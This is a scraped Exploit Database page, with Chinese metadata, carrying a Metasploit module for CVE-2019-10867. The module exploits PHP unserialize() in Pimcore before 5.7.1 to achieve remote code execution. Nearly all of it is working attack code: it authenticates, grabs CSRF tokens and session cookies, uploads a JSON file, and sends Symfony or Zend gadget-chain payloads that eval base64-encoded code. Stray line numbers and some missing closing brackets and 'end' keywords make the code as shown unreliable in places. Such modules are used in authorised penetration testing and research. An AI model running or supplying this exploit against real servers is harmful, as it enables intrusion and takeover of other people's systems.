Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)

Exploit Database
120 阅读

作者： Metasploit

日期： 2019-04-30
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/46783/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => "Pimcore Unserialize RCE",

'Description' => %q(

This module exploits a PHP unserialize() in Pimcore before 5.7.1 to

execute arbitrary code. An authenticated user with "classes" permission

could exploit the vulnerability.

The vulnerability exists in the "ClassController.php" class, where the

"bulk-commit" method makes it possible to exploit the unserialize function

when passing untrusted values in "data" parameter.

Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony

unserialize payload.

Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.

'License' => MSF_LICENSE,

'Author' =>

[

'Daniele Scanu', # Discovery & PoC

'Fabio Cogno' # Metasploit module

'References' =>

[

['CVE', '2019-10867'],

['URL', 'https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73'],

['URL', 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998']

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets' =>

[

['Pimcore 5.x (Symfony unserialize payload)', 'type' => :symfony],

['Pimcore 4.x (Zend unserialize payload)', 'type' => :zend]

'Payload' => {

'Space' => 8000,

'DisableNops' => true

'Privileged' => false,

'DisclosureDate' => "Mar 11 2019",

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, "Base Pimcore directory path", '/']),

OptString.new('USERNAME', [true, "Username to authenticate with", '']),

OptString.new('PASSWORD', [false, "Password to authenticate with", ''])

]

)

end

def login

# Try to login

res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri.path, 'admin', 'login', 'login'),

'vars_post' => {

'username' => datastore['USERNAME'],

'password' => datastore['PASSWORD']

}

)

unless res

fail_with(Failure::Unreachable, 'Connection failed')

end

if res.code == 302 && res.headers['Location'] =~ /\/admin\/\?_dc=/

print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")

# Grabbing CSRF token and PHPSESSID cookie

return grab_csrftoken(res)

end

if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/

fail_with(Failure::NoAccess, 'Invalid credentials')

end

fail_with(Failure::NoAccess, 'Authentication was unsuccessful')

end

def grab_csrftoken(auth_res)

uri = "#{target_uri.path}admin/?_dc=#{auth_res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first}"

res = send_request_cgi(

'method' => 'GET',

'uri' => normalize_uri(uri),

'cookie' => auth_res.get_cookies

)

if res && res.code == 200

# Pimcore 5.x

unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?

@csrf_token = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s

@pimcore_cookies = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]

fail_with(Failure::NotFound, 'Failed to retrieve cookies') unless @pimcore_cookies

@pimcore_cookies << " pimcore_admin_sid=1;"

# Version

version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]

build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]

fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build

print_version(version, build)

return assign_target(version)

end

# Pimcore 4.x

unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?

@csrf_token = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s

@pimcore_cookies = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]

fail_with(Failure::NotFound, 'Unable to retrieve cookies') unless @pimcore_cookies

# Version

version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]

build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]

fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build

print_version(version, build)

return assign_target(version)

end

# Version different from 4.x or 5.x

return nil

else

fail_with(Failure::NoAccess, 'Failed to grab csrfToken and PHPSESSID')

end

def print_version(version, build)

print_status("Pimcore version: #{version}")

print_status("Pimcore build: #{build}")

end

def assign_target(version)

if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')

print_good("The target is vulnerable!")

return targets[0]

elsif Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')

print_good("The target is vulnerable!")

return targets[1]

else

print_error("The target is NOT vulnerable!")

return nil

end

def upload

# JSON file payload

fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}"

# construct POST data

data = Rex::MIME::Message.new

data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")

# send JSON file payload to bulk-import function

res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),

'vars_get' => { 'csrfToken' => @csrf_token },

'cookie' => @pimcore_cookies,

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'data' => data.to_s

)

unless res

fail_with(Failure::Unreachable, 'Connection failed')

end

if res.code == 200

json = res.get_json_document

if json['success'] == true

print_good("JSON payload uploaded successfully: #{json['filename']}")

return json['filename']

else

print_warning('Could not determine JSON payload file upload')

return nil

end

def check

res = send_request_cgi(

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, 'admin', 'login')

)

unless res

return Exploit::CheckCode::Unknown

end

if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Unknown

end

def exploit

# Try to log in, grab csrfToken and select target

my_target = login

if my_target.nil?

fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')

end

# Try to upload JSON payload file

fname = upload

unless fname.nil?

# Register uploaded JSON payload file for cleanup

register_files_for_cleanup(fname)

end

print_status("Selected payload: #{my_target.name}")

case my_target['type']

when :symfony

# The payload to execute

spayload = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"

# The Symfony object payload

serialize = "O:43:\"Symfony\\Component\\Cache\\Adapter\\ApcuAdapter\":3:{"

serialize << "s:64:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00mergeByLifetime\";"

serialize << "s:9:\"proc_open\";"

serialize << "s:58:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00namespace\";a:0:{}"

serialize << "s:57:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00deferred\";"

serialize << "s:#{spayload.length}:\"#{spayload}\";}"

when :zend

# The payload to execute

spayload = "eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"

# The Zend1 object payload

serialize = "a:2:{i:7;O:8:\"Zend_Log\":1:{s:11:\"\x00*\x00_writers\";a:1:{"

serialize << "i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\x00*\00_eventsToMail\";a:1:{"

serialize << "i:0;i:1;}s:22:\"\x00*\x00_layoutEventsToMail\";a:0:{}s:8:\"\00*\x00_mail\";"

serialize << "O:9:\"Zend_Mail\":0:{}s:10:\"\x00*\x00_layout\";O:11:\"Zend_Layout\":3:{"

serialize << "s:13:\"\x00*\x00_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{"

serialize << "s:16:\"\x00*\x00_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\x00*\x00_replacement\";"

serialize << "S:#{spayload.length}:\"#{spayload}\";}"

serialize << "s:20:\"\x00*\x00_inflectorEnabled\";b:1;s:10:\"\x00*\x00_layout\";"

serialize << "s:6:\"layout\";}s:22:\"\x00*\x00_subjectPrependText\";N;}}};i:7;i:7;}"

end

# send serialized payload

send_request_cgi(

{

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),

'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',

'cookie' => @pimcore_cookies,

'vars_post' => {

'filename' => fname,

'data' => JSON.generate(

'type' => 'customlayout',

'name' => serialize

)

'headers' => {

'X-pimcore-csrf-token' => @csrf_token

}

}, 30

)

end